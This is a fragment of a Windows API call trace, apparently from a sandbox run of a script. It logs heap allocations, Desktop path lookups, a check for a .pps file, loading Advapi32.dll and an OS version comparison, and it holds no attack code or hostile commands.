0x24a9708 [0188.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0188.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0188.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0188.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0188.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0188.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.486] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0188.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0188.487] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0188.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0188.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0188.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0188.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0188.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0188.488] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0188.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0188.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0188.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.488] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0188.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0188.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0188.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0188.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0188.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0188.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0188.491] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0188.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0188.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0188.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.491] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0188.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0188.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.492] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0188.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0188.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0188.493] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0188.493] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.493] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0188.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.493] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0188.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.493] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.493] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.494] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/OPqP3gN.pps", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdad68f60, ftCreationTime.dwHighDateTime=0x1d4c978, ftLastAccessTime.dwLowDateTime=0xbd16f080, ftLastAccessTime.dwHighDateTime=0x1d4c7cc, ftLastWriteTime.dwLowDateTime=0xbd16f080, ftLastWriteTime.dwHighDateTime=0x1d4c7cc, nFileSizeHigh=0x0, nFileSizeLow=0x172a0, dwReserved0=0xca10006, dwReserved1=0xf343, cFileName="OPqP3gN.pps", cAlternateFileName="")) returned 0xaa58a0 [0188.494] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0188.494] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.494] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.495] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.495] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.495] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.495] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.495] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0188.496] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.497] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.497] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.497] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.497] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.498] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.498] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0188.498] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.498] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.498] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0188.500] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.500] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0188.500] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.500] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.500] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.501] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.501] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.501] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.501] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0188.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0188.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0188.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0188.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 